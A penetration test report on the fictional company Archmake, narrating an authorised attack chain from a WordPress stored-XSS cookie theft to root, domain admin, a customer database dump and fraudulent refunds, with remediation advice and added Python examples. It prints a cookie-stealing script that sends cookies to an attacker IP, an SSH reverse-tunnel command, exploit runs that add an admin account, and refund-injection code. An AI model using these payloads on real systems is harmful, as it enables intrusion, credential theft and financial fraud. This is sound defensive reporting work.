PENETRATION TEST REPORT - ARCHMAKE.COM 18-20120228
Copyright 2012 Offensive Security Ltd. All rights reserved. Page 1 of 32

Executive Summary

Offensive Security has been contracted to conduct a penetration test against Archmake's external web presence. The assessment was conducted in a manner that simulated a malicious actor engaged in a targeted attack against the company, with the goals of:

o Identifying if a remote attacker could penetrate Archmake's defenses.
o Determining the impact of a security breach on:
  o The integrity of the company's order systems.
  o The confidentiality of the company's customer information.
  o The internal infrastructure and availability of Archmake's information systems.

The assessment was conducted in accordance with the recommendations outlined in NIST SP 800-115 [1]. The results of this assessment will be used by Archmake to drive future decisions as to the direction of their information security program. All tests and actions were conducted under controlled conditions.

Summary of Results

Network reconnaissance was conducted against the address space provided by Archmake, with the understanding that this space would be considered the scope for this engagement. It was determined that the company maintains a minimal external presence, consisting of an external web site and a hosted mail service. This constituted a small attack surface, necessitating a focus on the primary website.

While reviewing the security of the primary Archmake website, it was discovered that a vulnerable WordPress plugin was installed. This plugin was successfully exploited, leading to administrative access to the WordPress installation. This access was utilized to obtain interactive access to the underlying operating system, and then escalated to root privileges. Armed with administrative access to the Archmake webserver, Offensive Security was then able to identify internal network resources.
A vulnerability in an internal system was leveraged to gain local system access, which was then escalated to domain administrator rights. This placed the entire infrastructure of the network under the control of the attackers.
[1] http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf

While mapping the internal network, an application was discovered that accessed an internal corporate database. The application was compromised, and in doing so allowed Offensive Security to gain access to the internal database where customer information is stored. Additionally, it was found that this database system manages customer orders. This system was used to process returns on attacker-controlled credit cards, allowing Offensive Security to extract funds directly from the company.
Attack Narrative

WordPress Exploitation

While conducting discovery against the target systems, it was discovered that a WordPress 3.3.1 installation was in place. While this system was being reviewed for security issues, the WPScan [2] tool was used, which reported that an insecure plugin was in place.

As reported by WPScan, the Relevanssi plugin suffered from a Cross-Site Scripting vulnerability [3], documented on the Exploit Database. This vulnerability was leveraged to conduct a stored Cross-Site Scripting attack, with the intent of stealing authentication cookies from an administrative user.
[2] http://code.google.com/p/wpscan
[3] http://www.exploit-db.com/exploits/16233

    ./wpscan.rb --url www.Archmake.com --enumerate p
    [WPScan ASCII-art banner]
    v1.1 WordPress Security Scanner by ethicalhack3r.co.uk
    Sponsored by the RandomStorm Open Source Initiative
    _____________________________________________________

    | URL: http://www.Archmake.com/
    | Started on Tue Jan 24 18:44:49 2012

    [!] The WordPress theme in use is called "twentyeleven".
    [!] The WordPress "http://www.Archmake.com/readme.html" file exists.
    [!] WordPress version 3.3.1 identified from meta generator.
    [+] Enumerating installed plugins...
    Checking for 2892 total plugins... 100% complete.
    [+] We found 2 plugins:
    Name: relevanssi
    Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
    Directory listing enabled? Yes.
    Name: relevanssi
    Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
    Directory listing enabled? Yes.
    [+] There were 1 vulnerabilities identified from the plugin names:
    [!] Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability
    * Reference: http://www.exploit-db.com/exploits/16233/
    [+] Finished at Tue Jan 24 18:45:30 2012

To conduct this attack, Offensive Security inserted the following code into the search bar on the Archmake web site:

    <script>new Image().src="http://172.16.40.204/p.php?cookie="+document.cookie;</script>

The payload creates an image object whose source URL points at the attacker's host, with the value of document.cookie appended as a query parameter; loading it causes the victim's browser to send that cookie string to the attacker in a plain GET request.

For this attack to execute properly, a user logged into the WordPress administrative interface was required to access the "User Searches" page. When this page was accessed, the cross-site scripting attack was executed. This can be verified by using the view-source option on the "User Searches" page.

At the time the "User Searches" page was accessed, a remote listener was running on the attacker's machine. This captured the logged-in user's authentication cookie.
This cookie was then manually inserted into Firefox using a cookie editor. This bypassed the login function by tricking WordPress into believing the attacker had already successfully authenticated to the system. After reloading the web page, it was verified that administrative access had successfully been obtained.

    GET /p.php?cookie=wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7C72c3335ad1e783b75bb3d8cf9e85fc9c;%20wp-settings-time-1=1327925790;%20wordpress_test_cookie=WP+Cookie+check;%20wordpress_logged_in_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7Caf1bcabca49191de76ec45e798ae5ada;%20wp-settings-1=editor%3Dhtml;%20wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1327599469%7C3ada64cf8e918c9a4bf148896181fc63;%20wordpress_logged_in_ed8a4e5dd813c7b5d262130b08955a6a=admin HTTP/1.1

Two points about this capture matter for remediation. The wordpress_<hash> and wordpress_logged_in_<hash> cookies each carry user|expiry|hmac, so a stolen cookie remains usable until the embedded expiry timestamp regardless of whether the plugin is later patched; existing administrator sessions should therefore be invalidated (changing the admin password or rotating the authentication keys and salts in wp-config.php both do this). The cookies were also readable by script in this case: session cookies flagged HttpOnly are not visible to document.cookie, and confirming that the deployed site sets that flag is a worthwhile check.
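What the captured string actually encodes, as an added example that is not part of the report or the listener used in the test: the script below reconstructs the request line from the listener output above (line wrap removed, the truncated trailing cookie dropped), URL-decodes the cookie parameter, splits it into the individual cookies and decodes each WordPress 3.x authentication cookie into its user, expiry and HMAC parts, then reports whether the session would still be accepted at a given point in time. It contacts nothing; the timestamp chosen for "now" is an assumption.

```python
"""Decode WordPress 3.x auth cookies out of a captured cookie-stealer request.

Added example for this report, not the original tool. CAPTURED_REQUEST is
reconstructed from the listener output in the report; nothing here talks to
a network.
"""
import urllib.parse
from datetime import datetime, timezone

# Reconstructed from the GET request the listener logged (line wrap removed,
# truncated last cookie dropped). Values are as captured; each %7C is a '|'.
CAPTURED_REQUEST = (
    "GET /p.php?cookie="
    "wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588"
    "%7C72c3335ad1e783b75bb3d8cf9e85fc9c;"
    "%20wp-settings-time-1=1327925790;"
    "%20wordpress_test_cookie=WP+Cookie+check;"
    "%20wordpress_logged_in_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588"
    "%7Caf1bcabca49191de76ec45e798ae5ada;"
    "%20wp-settings-1=editor%3Dhtml;"
    "%20wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1327599469"
    "%7C3ada64cf8e918c9a4bf148896181fc63"
    " HTTP/1.1"
)


def cookie_param(request_line):
    """Return the URL-decoded 'cookie' query parameter of an HTTP request line."""
    _method, target, _version = request_line.split(" ")
    query = target.partition("?")[2]
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == "cookie":
            # unquote, not unquote_plus: the '+' in the test cookie is literal
            return urllib.parse.unquote(value)
    raise ValueError("request carries no cookie parameter")


def split_cookies(cookie_string):
    """Split a document.cookie string into (name, value) pairs, keeping duplicates."""
    pairs = []
    for chunk in cookie_string.split(";"):
        chunk = chunk.strip()
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((name, value))
    return pairs


def parse_wp_auth(name, value):
    """Decode a WordPress 3.x auth cookie (wordpress_<hash> / wordpress_logged_in_<hash>).

    The suffix after the prefix is WordPress's COOKIEHASH (md5 of the site URL);
    the value is user|expiration|hmac. Anything else, such as
    wordpress_test_cookie, is ignored.
    """
    if not name.startswith("wordpress_") or value.count("|") != 2:
        return None
    user, expires, mac = value.split("|")
    if not expires.isdigit() or len(mac) != 32:
        return None
    return {"name": name, "user": user, "expires": int(expires), "hmac": mac}


def session_report(request_line, now):
    """List every auth cookie in the capture and whether it is still usable at `now` (epoch seconds)."""
    report = []
    for name, value in split_cookies(cookie_param(request_line)):
        auth = parse_wp_auth(name, value)
        if auth is None:
            continue
        auth["expires_utc"] = datetime.fromtimestamp(auth["expires"], timezone.utc).isoformat()
        auth["usable"] = now < auth["expires"]
        report.append(auth)
    return report


if __name__ == "__main__":
    # Assumed "now": 2012-01-30 13:26:40 UTC, a moment during the engagement.
    for c in session_report(CAPTURED_REQUEST, now=1327930000):
        print(f"{c['name'][:20]}... user={c['user']} expires={c['expires_utc']} usable={c['usable']}")
```

Running it shows three auth cookies for admin: the two current ones expire at 2012-02-01 12:16:28 UTC (two days after the wp-settings-time value, matching WordPress's default cookie lifetime), and the older wordpress_ cookie from 2012-01-26 has already lapsed. Until that expiry passes, the stolen cookie is as good as the password.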
Once this level of administrative access was obtained, full control via the WordPress administrative interface was possible. This can result in code execution on the site through multiple methods, most directly through the editing of the WordPress theme files, which grants access to the underlying PHP code. The integrity of the webserver was now compromised, with multiple escalation paths available to the attacker. For details of the exploited vulnerability, please see Appendix A.

WordPress Plugin Unintended File Type Upload

Once administrative access to the WordPress system had been obtained, an effort was made to identify any additional vulnerabilities that could be leveraged by an attacker. As part of this effort, a review of the installed plugins was made. While conducting this review, a plugin was identified that allowed for the uploading of user-supplied profile images.

Upon reviewing the source code for this plugin, Offensive Security discovered that a regular expression controls the types of files that may be uploaded to the site.

[Figure: source of the upload script, with the file-type regular expression highlighted]

The above section of code from the upload script checks for allowed file types in a flawed manner. The regular expression performs a simple string evaluation, and is the only test used to determine the file type of the object the user is attempting to upload. The intent of the regex is to match a file name such as "MyImage.png", with the highlighted portion of the name equalling the regular expression match. However, a file such as "MyEvilFile.png.php" would successfully match as well, because the pattern only requires an allowed extension to appear somewhere in the name rather than at its end, allowing the upload of an executable script. It was decided to leverage this vulnerability to upload attacker-supplied tools and scripts to the targeted system. There are multiple ways that file transfers could be conducted with the level of access that had been obtained; however, it was decided that leveraging this process had the dual benefit of demonstrating an existing vulnerability on the site, as well as minimizing the changes made to the webserver.
To verify that the upload process worked as intended, a standard graphic file was uploaded as a test. Once this was completed successfully, Offensive Security modified the name of a PHP reverse shell (pre-configured to connect back to an Offensive Security controlled system so as to not introduce an additional security vulnerability) and uploaded it to the system. A listener was then run on the attacker-controlled system and the PHP reverse shell was accessed, resulting in interactive shell access on the remote system. Because this shell was running within the context of the webserver, it only had minimal system permissions.
For details of the exploited vulnerability, please see Appendix A.

Linux Local Privilege Escalation

With interactive access to the targeted webserver obtained, the next objective was to gain administrative access to the system. The operating system of the webserver was determined to be "Linux version 2.6.32-5-686 (Debian 2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Mon Oct 3 04:15:24 UTC 2011". After researching potential attack vectors, it was discovered that the system was vulnerable to a race condition in bzip2. A publicly available exploit [4] for this vulnerability was found on the Exploit Database. To escalate privileges, the exploit was uploaded to the system via the insecure profile picture upload plugin.

[4] http://www.exploit-db.com/exploits/18147

    root@bt:~# nc -lvp 53
    listening on [any] 53 ...
    connect to [172.16.40.204] from www.Archmake.com [172.16.40.1] 34850
    Linux archwww 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 2011 i686 GNU/Linux
     10:49:14 up 12 days, 23:47,  2 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
    rdole    tty7     :0               16Jan12 12days  5:51   0.24s x-session-manag
    rdole    pts/2    :0.0             Tue10    6:01m  0.38s 44.68s gnome-terminal
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
It was then a straightforward process of decompressing the executable, providing execute permissions, and running the exploit. This resulted in root-level access, allowing full control of the entire webserver.

    $ cd /var/www/wp-content/uploads/2012/02
    $ ls race.png.gz
    race.png.gz
    $ gunzip race.png.gz
    $ chmod +x race.png
    $ ./race.png
    usage: ./race.png <cmd name>
    $ ./race.png dd
    id
    uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

At this point, the webserver represents an internal attack platform for a malicious party. With full administrative access now available, a malicious party could utilize the system for a multitude of purposes, ranging from attacks against Archmake itself to attacks against its customers. If this had been a true compromise, Archmake administrators would not be able to trust any data on the webserver. For details of the exploited vulnerability, please see Appendix A.

Maintaining Access to Compromised Webserver

Once administrative access to the webserver had been established, further attacks against Archmake required a more stable connection than what was provided by the PHP backdoor. Upon examining the exploited webserver, it was discovered that an SSH service was running on port 22000. It was decided that using this service was a better solution for establishing a standard method of interaction without introducing additional security vulnerabilities to the system. In order to minimize changes to the system, SSH key-based authentication was used rather than altering or adding any user accounts. These keys work as a method of authentication through the use of public key cryptography, consisting of a public/private key pair. To enable this access, the attacker's public key was added to the authorized_keys file for the root user. Additionally, the public key of the web server was copied to the authorized_keys file of the attacking system, so that the web server could authenticate outbound to the attacker's host. With the aforementioned authentication system in place, an SSH server was started on the attacker's system on TCP port 53.
We were confident that the webserver would be able to make outbound connections to the remote system using that port, based upon the initial exploit: the PHP reverse shell had already connected back to the listener on TCP port 53. From the PHP shell environment, the command

    ssh -o 'StrictHostKeyChecking no' -R 22000:127.0.0.1:22000 -p 53 172.16.40.204 ping 127.0.0.1

was executed and initiated a connection from the victim's system to the attacker. The -R option asks the attacker's SSH server to listen on its own port 22000 and relay anything that connects there back through the tunnel to port 22000 on the victim, that is, to the victim's local SSH service; the trailing ping 127.0.0.1 is simply a long-running command that keeps the session, and therefore the tunnel, open. This created a listener on the attacker's system that tunnels local connections to the listening SSH server on the victim's system.

This tunnel was then utilized to open a standard SSH connection as the root user to the victim web server. Additionally, a SOCKS proxy was created between the two systems, allowing applications on the attacker's system to access the victim's network through the proxy. This has the effect of making all connections appear as if they are coming from the victim's system. This configuration allowed the attacker to masquerade as the victim's system.
For the purposes of the penetration test, this connection was created manually. In the instance of a true attack, it is likely that the attacker would implement an automated process to re-create the tunnels if the connection was broken for any reason. This phase of the attack did not exploit any vulnerabilities or take advantage of any newly discovered misconfigurations on the system. It was simply the result of the level of access that had been obtained on the system due to the success of the previous attacks. This phase is where the attacker consolidated the necessary access and control to further penetrate Archmake's network. Clearly understanding this aspect is essential in understanding the scope of the penetration.

Vulnerable Splunk Installation

While inspecting the configuration of the compromised webserver, references were discovered to a 10.10.0.x network that appeared to be directly accessible by the compromised system. Network reconnaissance steps, used to discover additional assets located on this secondary network, revealed a Splunk server. Versions of Splunk prior to 4.2.5 suffer from a remote vulnerability that can be exploited with a publicly available exploit [5] located on the Exploit Database. Using the SOCKS proxy that was previously established, Offensive Security accessed the web interface of the Splunk installation, and identified that the installed version was 4.2.2, and thus vulnerable to attack.

[5] http://www.exploit-db.com/exploits/18245
To conduct the attack, the public exploit was transferred to the compromised webserver and then run against the targeted system. This attack is conducted in a blind manner, resulting in no response back from the executed commands. Because the remote system was Windows-based, it was decided that an attempt would be made to create a user account on the remote system. As Splunk is often installed with local SYSTEM privileges, this user could then be added to the Administrators group.

    root@archwww:~/exploit# python splunk_exploit.py -h
    Usage: Run splunk_exploit.py -h to see usage options

    Options:
      --version          show program's version number and exit
      -h, --help         show this help message and exit
      -t TARGETHOST      IP Address or hostname of target splunk server
      -c                 Generate CSRF URL only
      -f                 Target is configured to use a Free licence and does not permit remote auth
      -w SPLUNKWEB_PORT  The Splunk admin interface port (Default: 8000)
      -d SPLUNKD_PORT    The Splunkd Web API port (Default: 8089)
      -u USERFILE        File containing usernames for use in dictionary attack
      -p PASSFILE        File containing passwords for use in dictionary attack
      -U USERNAME        Admin username (if known)
      -P PASSWORD        Admin pasword (if known)
      -e USERPAIR        Attempt to add admin user via priv up directory traversal magic. Accepts username:password

    root@archwww:~/exploit# python splunk_exploit.py -t 10.10.0.3 -f
    [i] Splunkd server found. Version:4.2.2
    [i] OS:Windows 0 6
    [i] Splunk web interface discovered
    [i] CVAL:1480339707
    [i] Configured with free licence. No auth required
    [Payload Options]
    [1] Pseudo Interactive Shell
    [2] Perl Reverse Shell
    [3] Command Exec (Blind)
    Please select option 1-3:3
    blind_shell>net user hacker t00rt00rt00r! /add
    [i] Executing Command:net user hacker t00rt00rt00r! /add
    net user hacker t00rt00rt00r! /add
    blind_shell>net localgroup administrators hacker /add
    [i] Executing Command:net localgroup administrators hacker /add
    net localgroup administrators hacker /add

The success of the attack was tested by attempting to use the newly created account to establish an interactive session on the targeted system via Windows Remote Desktop.
With this connection established, we verified that the created account had local administrative access. At this point, Offensive Security had a level of access equal to sitting at the physical system console of the newly compromised host. For details of the exploited vulnerability, please see Appendix A.

Domain Privilege Escalation

To determine the full potential of this compromise, an attempt was made to escalate privileges from local administrator to domain administrator. Utilizing the compromised Splunk server, Offensive Security transferred Windows Credential Editor (WCE) [6] to the remote system through the use of the compromised webserver. WCE is a tool that allows attackers to make use of Windows credentials from memory and repurpose them for alternate use. Upon initial transfer of the WCE toolkit to the system, it was discovered that a Domain Administrator logon session, and with it that account's credential material, was present within memory. The presence of that credential on an ordinary member server is a finding in itself: privileged domain accounts should not be used to log on to hosts that a local administrator can compromise.

[6] http://www.ampliasecurity.com/research/wcefaq.html

With this credential in memory, it was a simple matter of using it to execute a new command shell that would operate with Domain Administrator rights.

This shell was then used to run the Microsoft Management Console (MMC) as the Domain Administrator. With the MMC loaded, the Active Directory Users and Computers snap-in was loaded, giving the attacker the ability to edit domain entities. This was utilized to create a new network user, which was subsequently added to the Domain Admins group.

This new user was capable of accessing the entire Archmake Active Directory domain, with full rights and privileges. At this point, the integrity of the entire Windows network is compromised. In terms of next steps, a true attacker would have multiple tools at their disposal, including:

o Utilization of Group Policy to deploy backdoor software on all systems.
o Complete exfiltration of all data stored on any system that uses Windows authentication.
o Destruction of any and all network resources.
o Targeted attacks against any and all employees of Archmake, through the use of information gathering tools such as keystroke loggers to identify personal information.
o Leveraging this systemic access to conduct attacks against Archmake suppliers and partners that maintain a trust relationship with the company.

It was determined that while these steps would be possible, they would be considered outside the scope of the current engagement. It was demonstrated that a total compromise of the Archmake domain had been accomplished, with a complete loss of integrity for all local systems. For details of the exploited vulnerability, please see Appendix A.

Database Content Exploitation

After the Splunk server was exploited, an examination of its local file systems revealed a directory containing an executable and a CSV file.
Upon investigating the CSV file, it was found to contain Archmake's customer information that had been extracted from a database server.

It was determined that this file was generated by the exportcsv.exe program. This program was examined to obtain an understanding of its inner workings, and to determine if it contained any information that would facilitate access to the database server. While viewing the program within a debugger, it was discovered that it created a direct connection to a Microsoft SQL server. The credentials for this connection were hard coded within the application.

By making use of these credentials, it was possible to make a direct connection to the backend database server and directly access the data. This access allowed us to directly manipulate all data within the database.
Utilizing this connection, an export of the database was performed. This resulted in a significant compromise of customer data. Fields that were extracted included: UserID, first and last name, e-mail address, telephone number, password (stored as a hash), mailing address, and various bits of user information.

After examining the output, it was determined that the password field was composed of unsalted MD5 hashes. These hashes were loaded into an Offensive Security operated password cracker. Of the 1000 unique hashes loaded, 996 were recovered to clear text in under a minute of operation (the cracker log below records a run from 13:43:05 to 13:43:37). Two properties of the storage made this trivial: MD5 is fast enough that a GPU evaluates billions of candidates per second, and with no per-user salt a single candidate hash is compared against all 1000 stored values at once.
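Why nearly every hash fell in seconds, and what the remediation for the "Database Unsalted Password Storage" finding in Appendix A means in practice, as an added example that is not part of the report: it cracks a constructed set of unsalted MD5 hashes with a dictionary (one table of candidate hashes serves every stored value), then shows that salted, iterated PBKDF2 records force one full computation per stored hash per guess and give two users with the same password different records. The wordlist, the hashes and the iteration count are constructed for the demonstration; a production deployment would use far more iterations, or bcrypt or scrypt.

```python
"""Unsalted MD5 versus salted, iterated hashing on a constructed sample.

Added example, not the report's cracking run. Wordlist, hashes and iteration
count are constructed; use far more iterations (or bcrypt/scrypt) in production.
"""
import hashlib
import hmac
import os

# Constructed wordlist; a real run would use a large dictionary plus rules.
WORDLIST = ["password", "123456", "letmein", "archmake", "qwerty", "Summer2011", "welcome1"]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed "leaked" column: three weak passwords and one outside the wordlist.
LEAKED_UNSALTED = [md5_hex(p) for p in ["password", "archmake", "letmein", "Tr0ub4dor&3"]]


def crack_unsalted(hashes, wordlist):
    """One MD5 per candidate, reused against every hash: a lookup, not a search."""
    table = {md5_hex(word): word for word in wordlist}
    return {h: table.get(h) for h in hashes}


# Deliberately small iteration count so the demonstration runs quickly.
DEMO_ITERATIONS = 20_000


def pbkdf2_record(password, salt=None, iterations=DEMO_ITERATIONS):
    """Store salt, iteration count and derived key; the salt is random per record."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": dk.hex()}


def verify_pbkdf2(password, record):
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk.hex(), record["hash"])


def crack_salted(records, wordlist):
    """No shared table is possible: every (record, candidate) pair costs a full PBKDF2."""
    results = []
    for record in records:
        hit = next((w for w in wordlist if verify_pbkdf2(w, record)), None)
        results.append(hit)
    return results


def hash_operations(n_hashes, n_candidates):
    """Hash computations an attacker needs to try a dictionary of n_candidates words."""
    return {"unsalted_md5": n_candidates, "salted": n_hashes * n_candidates}


if __name__ == "__main__":
    print(crack_unsalted(LEAKED_UNSALTED, WORDLIST))
    recs = [pbkdf2_record("archmake"), pbkdf2_record("archmake")]
    print("same password, different records:", recs[0]["hash"] != recs[1]["hash"])
    print(crack_salted(recs + [pbkdf2_record("Tr0ub4dor&3")], WORDLIST))
    print(hash_operations(1000, 10_000_000))
```

The salt alone multiplies the attacker's work by the number of stored hashes; the iteration count then makes each of those computations slow by design, which is what a purpose-built password hash provides and a single MD5 never will.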
The effect of this amounts to a serious compromise. The volume of personal information extracted from the database, combined with the common tendency for password re-use, could significantly impact the customers of Archmake had this been a real attack. For details of the exploited vulnerability, please see Appendix A.

Password cracker output:

    Hashes: 1002
    Unique digests: 1000
    Bitmaps: 13 bits, 8192 entries, 0x00001fff mask, 32768 bytes
    Rules: 1
    GPU-Loops: 128
    GPU-Accel: 40
    Password lengths range: 1 - 15
    Platform: AMD compatible platform found
    Watchdog: Temperature limit set to 90c
    Device #1: Cayman, 2048MB, 0Mhz, 22MCU
    Device #2: Cayman, 2048MB, 0Mhz, 22MCU
    Device #1: Allocating 132MB host-memory
    Device #1: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)
    Device #2: Allocating 132MB host-memory
    Device #2: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)
    Started: Tue Jan 31 13:43:05 2012
    Stopped: Tue Jan 31 13:43:37 2012

Attacker Control of Archmake Transactions

While conducting further examination of the database backend, we determined that a number of tables were being updated on a regular basis. By monitoring the activity of these tables, it was discovered that as orders were entered into the system, they would be placed into the tables. On a periodic basis, another process would take action based upon the "Category".
Through a combination of monitoring database activity and placing orders through the standard system, it was possible to identify the purpose of a subset of Categories.
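The refund injection described in this section, together with the check a defender would want over the same table, as an added example that is neither Archmake's schema nor the report's data: it builds a small SQLite model of the order table using the category codes from the mapping in this section (1 and 3 charge the card, 4 refunds it, 6 is internal), inserts the attacker's row (a valid CustID, an attacker-owned card, category 4), and runs a query that flags refunds with no earlier charge to the same customer and card covering the amount. Every column name other than CustID and Category, and all card numbers, amounts and timestamps, are constructed.

```python
"""Model of the order table the report infers, the injected refund, and a check for it.

Added example, not Archmake's schema or the report's data. Column names other
than CustID and Category, the card numbers and the amounts are constructed.
"""
import sqlite3

# Category codes as mapped in this section of the report.
CATEGORY = {
    1: "standard order, card charged",
    2: "unknown",
    3: "rush order, card charged",
    4: "refund, card refunded",
    5: "unknown",
    6: "internal order",
}
CHARGE_CATEGORIES = (1, 3)
REFUND_CATEGORY = 4

SCHEMA = """
CREATE TABLE orders (
    OrderID  INTEGER PRIMARY KEY,
    CustID   INTEGER NOT NULL,
    Category INTEGER NOT NULL,
    CardNo   TEXT    NOT NULL,
    Amount   REAL    NOT NULL,
    Entered  TEXT    NOT NULL
);
"""
INSERT = "INSERT INTO orders (CustID, Category, CardNo, Amount, Entered) VALUES (?, ?, ?, ?, ?)"

# Constructed legitimate activity: two charged orders, one genuine refund, one internal order.
LEGIT_ROWS = [
    (1001, 1, "4111********1111",  89.95, "2012-02-10 09:12:00"),
    (1002, 3, "5500********0004", 149.00, "2012-02-10 09:40:00"),
    (1001, 4, "4111********1111",  89.95, "2012-02-11 14:05:00"),
    (1003, 6, "",                   0.00, "2012-02-11 15:00:00"),
]


def build_db(rows):
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany(INSERT, rows)
    con.commit()
    return con


def inject_refund(con, cust_id, card_no, amount, entered):
    """What direct database access let the attacker do: a refund row with no order behind it."""
    con.execute(INSERT, (cust_id, REFUND_CATEGORY, card_no, amount, entered))
    con.commit()


# A refund is explained only if an earlier charge to the same customer and card
# covers the amount; the back-end process the report describes never checked this.
ORPHAN_REFUNDS = """
SELECT r.OrderID, r.CustID, r.CardNo, r.Amount
FROM orders AS r
WHERE r.Category = ?
  AND NOT EXISTS (
      SELECT 1 FROM orders AS c
      WHERE c.CustID = r.CustID
        AND c.CardNo = r.CardNo
        AND c.Category IN (?, ?)
        AND c.Amount >= r.Amount
        AND c.Entered < r.Entered
  )
ORDER BY r.OrderID
"""


def orphan_refunds(con):
    """Refund rows that no prior charge explains; each is money leaving with nothing bought."""
    return con.execute(ORPHAN_REFUNDS, (REFUND_CATEGORY, *CHARGE_CATEGORIES)).fetchall()


if __name__ == "__main__":
    db = build_db(LEGIT_ROWS)
    print("before injection:", orphan_refunds(db))
    inject_refund(db, 1002, "4000********9999", 2500.00, "2012-02-12 02:13:00")
    for order_id, cust, card, amount in orphan_refunds(db):
        print(f"order {order_id}: CustID {cust} card {card} {CATEGORY[REFUND_CATEGORY]} {amount:.2f}")
```

The query is detection after the fact, and it would run as part of the periodic process that acts on the Category column. The structural fix is that a refund row must reference the order it reverses (a constraint the injected row could not satisfy) and that nothing but the application, using a least-privilege account, can write to this table, which is what Recommendation 6 asks for.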
Category  Meaning
1         Standard order, card charged
2         Unknown
3         Rush order, card charged
4         Refund, card refunded funds
5         Unknown
6         Internal order

Once a mapping of transaction types was created, an attempt was made to manually inject data into this table. It was discovered that by injecting a valid CustID and an attacker-owned credit card number with a category of 4 (Refund), an arbitrary amount of money could be refunded to the attackers. This was verified in cooperation with Archmake under controlled conditions. It is believed, but not tested, that new orders could be placed and shipped to attacker-created customer entities. This was not verified due to the disruption it would cause to the Archmake workflow. By exerting control over the backend database system, it was possible to have control over the entirety of the Archmake order process. This is of extreme importance to Archmake, due to the amount of disruption it could cause to its business processes. Additionally, the ability of an attacker to obtain direct financial benefit from this attack makes Archmake an extremely attractive target. For details of the exploited vulnerability, please see Appendix A.

Conclusion

In the course of the external penetration test, Archmake suffered a cascading series of breaches that led to conditions that would directly harm the company as well as its customers. The specific goals of the penetration test were stated as:

o Identify if a remote attacker could penetrate Archmake's defenses.
o Determine the impact of a security breach on:
  o The integrity of the company's order systems.
  o The confidentiality of the company's customer information.
  o The internal infrastructure and availability of Archmake's information systems.

These goals of the penetration test were met. It was determined that a remote attacker would be able to penetrate Archmake's defenses.
To make this situation even worse, the initial attack vector can be discovered via automated scanning, creating a situation where a remote attack could be initiated on a non-targeted basis. The impact of this penetration led to the complete control of Archmake's information systems by the attacker. Archmake's customer privacy was directly impacted through the attacker's ability to obtain a large amount of information about them, including clear-text passwords, through the use of a brute force attack. This exposes the customers to direct attack, which could lead to financial impact. Customer trust in Archmake would be negatively impacted were such an event to occur. It was possible to obtain complete and total control over the company order process. This provided the attacker with the ability to steal funds from Archmake, making this attack both very damaging and very attractive.

Recommendations

Due to the impact to the overall organization as uncovered by this penetration test, appropriate resources should be allocated to ensure that remediation efforts are accomplished in a timely manner. While a comprehensive list of items that should be implemented is beyond the scope of this engagement, some high-level items are important to mention.

1. Implement and enforce implementation of change control across all systems: Misconfiguration and insecure deployment issues were discovered across the various systems. The vulnerabilities that arose can be mitigated through the use of change control processes on all server systems.

2. Implement regular firewall rule set reviews: Review the firewall rule set on a regular basis to ensure that all systems open to internal traffic continue to have a business reason to exist. We recommend that NIST SP 800-41 [7] be consulted for guidelines on firewall configuration and testing.

3. Implement a patch management program: Operating a consistent patch management program per the guidelines outlined in NIST SP 800-40 [8] is an important component in maintaining good security posture. This will help to limit the attack surface that results from running unpatched internal services.

4. Conduct regular vulnerability assessments: As part of an effective organizational risk management strategy, vulnerability assessments should be conducted on a regular basis. Doing so will allow the organization to determine if the installed security controls are installed properly, operating as intended, and producing the desired outcome. Consult NIST SP 800-30 [9] for guidelines on operating an effective risk management program.

5. Restrict network access to server management interfaces: Proper network segmentation will reduce exposure to internal attacks against the server environment. Operating a well-designed DMZ will allow Archmake to conduct its e-commerce business in a manner that does not expose internal systems to attack. Consult FIPS 191 [10] for guidelines on securing local area networks.

6. Restrict access to critical systems: It is recommended that the database server be isolated from other systems. If possible, a whitelist of database commands should be implemented specifying the minimum number of commands required to support business operations. This is in line with the system design concept of least privilege, and will limit the amount of damage an attacker can inflict on corporate resources. Consult NIST SP 800-27 Rev A [11] for guidelines on achieving a security baseline for IT systems.

7. Apply industry methodologies for secure software design: The use of hard-coded credentials within custom applications is highly discouraged. Users should have a need to know, and be required to provide, credentials before accessing confidential and proprietary data. This provides better security, and an audit trail that allows the business to tie actions to specific user accounts.

For details on the specific exploited vulnerabilities, please see Appendix A.

[7] http://csrc.nist.gov/publications/nistpubs/800-41-Rev1/sp800-41-rev1.pdf
[8] http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf
[9] http://csrc.nist.gov/publications/PubsDrafts.html#SP-800-30-Rev.201
[10] http://csrc.nist.gov/publications/fips/fips191/fips191.pdf
[11] http://csrc.nist.gov/publications/nistpubs/800-27A/SP800-27-RevA.pdf

Risk Rating

The overall risk posed to Archmake as a result of this penetration test is High. A non-targeted attacker has the potential to damage the company in a manner that would have direct operational and financial impact.
